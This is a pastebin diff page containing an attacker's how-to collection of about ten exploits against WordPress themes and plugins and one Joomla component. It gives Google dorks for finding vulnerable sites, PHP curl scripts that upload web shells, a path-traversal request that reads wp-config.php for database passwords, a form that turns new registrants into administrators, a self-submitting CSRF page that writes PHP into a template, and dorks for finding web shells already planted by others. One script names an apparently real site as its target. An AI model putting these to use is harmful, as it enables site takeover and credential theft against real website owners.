View difference between Paste ID: <a href="/WbinLehr">WbinLehr</a> and <a href="/2cFQmtaN">2cFQmtaN</a>

                                                          YH=YH=YH=ANON=Yh=Yh=yH
1		YH=YH=YH=ANON=Yh=Yh=yH
2		#YassineElHilali
3
4		#1.Exploit Title:WordPress Font Uploader Shell Upload
5		Google Dork : inurl:/wp-content/plugins/font-uploader/
6		code===>
7		<?php
8
9		$uploadfile="yourshellname.php.ttf";
10		$ch =
11		curl_init("http://www.yourtarget.com/wp-content/plugins/font-uploader/font-upload.php");
12		curl_setopt($ch, CURLOPT_POST, true);
13		curl_setopt($ch, CURLOPT_POSTFIELDS,
14		array('font'=>"@$uploadfile",
15		'Submit'=>'submit'));
16		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
17		$postResult = curl_exec($ch);
18		curl_close($ch);
19		print "$postResult";
20
21		?>
22		========================================================
23		#2.Exploit Title:Wordpress plugin Arbitary File Upload All Version
24		Google Dork: inurl:assets/uploadify/ site:.com [use your brain for dorking]
25		==>after going to your desire site u will find a file/folder [uploadify] u need to click there
26		sample==>http://www.yourtarget.com/assets/themes/plugins/uploadify/uploadify.php
27		code==>
28		<?php
29		$uploadfile="yourshell.php";
30
31		$ch = curl_init("http://www.abhaya.org/assets/themes/plugins/uploadify/uploadify.php");
32		curl_setopt($ch, CURLOPT_POST, true);
33		curl_setopt($ch, CURLOPT_POSTFIELDS,
34		array('Filedata'=>"@$uploadfile",
35		'folder'=>'/'));
36		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
37		$postResult = curl_exec($ch);
38		curl_close($ch);
39		print "$postResult";
40
41		?>
42		==========================================================
43		#3.Exploit Title:Wordpress Atom Themes Arbitary File Upload
44		Google Dork : inurl:"/wp-content/themes/atom/"
45		code==>
46		<?php
47		$uploadfile="yourshell.php";
48
49		$ch = curl_init("http://www.yourtarget.com/wp-content/themes/atom/uploadify/uploadify.php");
50		curl_setopt($ch, CURLOPT_POST, true);
51		curl_setopt($ch, CURLOPT_POSTFIELDS,
52		array('Filedata'=>"@$uploadfile",
53		'folder'=>'/'));
54		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
55		$postResult = curl_exec($ch);
56		curl_close($ch);
57		print "$postResult";
58
59		?>
60
61		Shell Access : http://www.yourtarget.com/wp-content/themes/atom/uploadify/uploads/randomnumber[ur shellname].php
62		=============================================================
63		#4.Exploit Title:WordPress theme soulmedic Arbitrary File Download Vulnerability
64		Google Dork:inurl:"/wp-content/themes/soulmedic/"
65		http://www.yourtarget.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
66		===>u will find database password/name of that server
67		================================================================
68		#5.Exploit Title:PHP File Upload Vulnerability
69		Google Dork:inurl:images/jupload.php;guest100;guest100
70		http://www.yourtarget.com/images/jupload.php;guest100;guest100 [u need to remove this ;guest100;guest100]
71		http://www.yourtarget.com/images/jupload.php [after removing ;guest100;guest100]
72		if u find uploading option then u can upload your shell
73		shell access==>http://www.yourtarget.com/images/shell.php
74		==================================================================
75		#6.Exploit Title:Hades+ Framework Add Administrator
76		Google multiple Dork: inurl:/wp-content/themes/appius/
77		inurl:/wp-content/themes/Consultant/
78		inurl:/wp-content/themes/appius1/
79		inurl:/wp-content/themes/archin/
80		inurl:/wp-content/themes/averin/
81		inurl:/wp-content/themes/dagda/
82		inurl:/wp-content/themes/echea/
83		inurl:/wp-content/themes/felici/
84		inurl:/wp-content/themes/kmp/
85		inurl:/wp-content/themes/kmp2/
86		inurl:/wp-content/themes/liberal/
87		inurl:/wp-content/themes/liberal-media-bias/
88		inurl:/wp-content/themes/linguini/
89		inurl:/wp-content/themes/livewire/
90		inurl:/wp-content/themes/majestics/
91		inurl:/wp-content/themes/mathis/
92		inurl:/wp-content/themes/mazine/
93		inurl:/wp-content/themes/Orchestra/
94		inurl:/wp-content/themes/shopsum/
95		inurl:/wp-content/themes/shotzz/
96		inurl:/wp-content/themes/test/
97		inurl:/wp-content/themes/Viteeo/
98		inurl:/wp-content/themes/vithy/
99		inurl:/wp-content/themes/yvora/
100		inurl:/wp-content/themes/sodales/
101		Exploit:
102		<form action="http://www.yourtarget.com/wp-content/themes/[themename,i mean:/appius//Consultant//archin/etc etc]/hades_framework/option_panel/ajax.php" method="POST">
103		<input name="values[0][name]" value="users_can_register">
104		<input name="values[0][value]" value="1">
105		<input name="values[1][name]" value="admin_email">
106		<input name="values[1][value]" value="{%YOUR_EMAIL}">
107		<input name="values[2][name]" value="default_role">
108		<input name="values[2][value]" value="administrator">
109		<input name="action" value="save">
110		<input type="submit" value="Submit">
111		</form>
112		Process==>
113		1.Change [themename,i mean:/appius//Consultant//archin/etc etc]vulnerable theme, [YOUR_EMAIL] with your email address.
114		sample==>http://www.yourtarget.com/wp-content/themes/[replace the vulnerable themename with yourmailaddress]/hades_framework/option_panel/ajax.php
115		2. go to http://www.yourtarget.com/wp-login.php?action=register, [you will see the registration form].
116		3. choose your username & email address and register.
117		4. go to your email, you will find your password.
118		5. then login & and upload your shell
119		===============================================================
120		#7.Exploit Title: Wordpress Dandelion Themes Arbitry File Upload
121		Google Dork: inurl:/wp-content/themes/dandelion/
122		Code==>
123		<?php
124		$uploadfile="yourshell.php";
125		$ch = curl_init("http://www.yourshell.com/wp-content/themes/dandelion/functions/upload-handler.php");
126		curl_setopt($ch, CURLOPT_POST, true);
127		curl_setopt($ch, CURLOPT_POSTFIELDS,
128		array('Filedata'=>"@$uploadfile"));
129		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
130		$postResult = curl_exec($ch);
131		curl_close($ch);
132		print "$postResult";
133		?>
134		shell link=> http://www.yourshell.com/uploads/[years]/[month]/your_shell.php
135		=====================================================================
136		#8.Exploit Title: Wordpress satoshi Themes Arbitry File Upload
137		Google Dork: inurl:/wp-content/satoshi/dandelion/
138		Code==>
139		<?php
140		$uploadfile="yourshell.php";
141		$ch = curl_init("http://www.yourshell.com/wp-content/themes/satoshi/functions/upload-handler.php");
142		curl_setopt($ch, CURLOPT_POST, true);
143		curl_setopt($ch, CURLOPT_POSTFIELDS,
144		array('Filedata'=>"@$uploadfile"));
145		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
146		$postResult = curl_exec($ch);
147		curl_close($ch);
148		print "$postResult";
149		?>
150		========================================================================
151		#8.Exploit Title:Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF
152		<?php
153		/**
154		* Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF
155		* 3 October 2010
156		* jdc
157		*
158		* How it works - admin template form has no nonce
159		* How to exploit - get a logged in admin to click the wrong link ;)
160		* Patched in 2.1.7
161		*/
162		// change these
163		$target = 'http://localhost/joomla';
164		$exploit = '<?php echo phpinfo(); ?>';
165		/* page - any one of:
166		page_addCategory
167		page_addListing
168		page_advSearchRedirect
169		page_advSearchResults
170		page_advSearch
171		page_claim
172		page_confirmDelete
173		page_contactOwner
174		page_errorListing
175		page_error
176		page_gallery
177		page_image
178		page_index
179		page_listAlpha
180		page_listing
181		page_listListings
182		page_ownerListing
183		page_print
184		page_recommend
185		page_replyReview
186		page_reportReview
187		page_report
188		page_searchByResults
189		page_searchResults
190		page_subCatIndex
191		page_usersFavourites
192		page_usersReview
193		page_writeReview
194		sub_alphaIndex
195		sub_images
196		sub_listingDetails
197		sub_listings
198		sub_listingSummary
199		sub_map
200		sub_reviews
201		sub_subCats
202		*/
203		$page = 'page_print';
204		// don't change these
205		$path = '/administrator/index.php';
206		$data = array(
207		'pagecontent' => $exploit,
208		'template' => 'm2',
209		'option' => 'com_mtree',
210		'task' => 'save_templatepage',
211		'page' => $page
212		);
213		?>
214		<html>
215		<body>
216		<?php if (@$_GET['iframe']) : ?>
217		<form id="csrf" action="<?php echo $target.$path; ?>" method="post">
218		<?php foreach ($data as $k => $v) : ?>
219		<input type="text" value="<?php echo htmlspecialchars($v); ?>"
220		name="<?php echo $k; ?>" />
221		<?php endforeach; ?>
222		<script type="text/javascript">
223		document.forms[0].submit();
224		</script>
225		</form>
226		<?php else : ?>
227		<h1>Mosets Tree 2.1.6 Template Overwrite CSRF Exploit</h1>
228		<p>If you were logged in as admin, you just got owned!</p>
229		<div style="display:none">
230		<iframe width="1" height="1" src="<?php __FILE__; ?>?iframe=1"></iframe>
231		</div>
232		<?php endif; ?>
233		</body>
234		</html>
235		#9.Exploit Title:wordpress potential themes vuln upload
236		1.dork: inurl:/wp-content/themes/nuance/
237		exploit: /functions/jwpanel/scripts/valums_uploader/php.php
238
239		2. dork: inurl:/wp-content/themes/lightspeed/
240		exploit: /framework/_scripts/valums_uploader/php.php
241
242		3. dork: inurl:/wp-content/themes/saico/
243		exploit: /framework/_scripts/valums_uploader/php.php
244
245		4. dork: inurl:/wp-content/themes/eptonic/
246		exploit: /functions/jwpanel/scripts/valums_uploader/php.php
247
248		5. dork: inurl:/wp-content/themes/skinizer/
249		exploit: /framework/_scripts/valums_uploader/php.php
250
251		6. dork: inurl:/wp-content/themes/area53/
252		exploit: /framework/_scripts/valums_uploader/php.php
253
254		7. dork: inurl:/wp-content/themes/blinc/
255		exploit:/framework/_scripts/valums_uploader/php.php
256
257		csrf from html:
258
259		<form enctype="multipart/form-data"
260		action="http://www.yourtarget.com/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php" method="post">
261		<input type="jpg" name="url" value="./" /><br />
262		Please choose a file: <input name="qqfile" type="file" /><br />
263		<input type="submit" value="upload" />
264		</form>
265		it the url allows you to upload your shell then u can upload it or if it says any #Error then find another one
266		shell link==>
267		http://www.yourtarget.com/wp-content/themes/yourthemename/yourshellname.php
268		http://www.yourtarget.com/wp-content/uploads/shell.php
269		#10.Exploit Title:For Noob[Dorking shell]
270		b374k m1n1
271		Quote:
272		google dork :
273		intitle:b374k m1n1 inurl:wp-content
274		intitle:"index of /" "b374k.php"
275
276
277		Dorking shell wso
278		Quote:
279		google dork :
280		intitle:"Index of /uploads" "wso.php"
281		intitle:"index of /" "wso.php"
282
283
284		Dorking Shell Madspot
285		Shell ini defaultnya tidak dipassword dan terindex google sehingga kita bisa dorking untuk menemukan shell ini.
286		Quote:
287		google dork :
288		intitle:Madspot Security site:com
289
290
291		Dorking Shell 1n73ct10n
292		Quote:
293		google dork :
294		intitle:1n73ct10n inurl:wp-content
295		intitle:"index of /" "1n73ct10n.php"]
296		###########################################################################################
297		and u can find many tut on google for JCE/Revslider/Com_user/comfabrik/webdav/Jdownload
298		But if u r a Pro in CMS/backendweb developer then u can make your own exploit for Joomla/wordpress/Drupal/woocommerce etc etc,but u need to know very clear idea of web apps/web apps development
299		website is a huge thing[plugin/theme/component/widget/framework:joomla,wordpress,drupal,Bootstrap,phpBB,etc etc many high profile backend developer will reward you]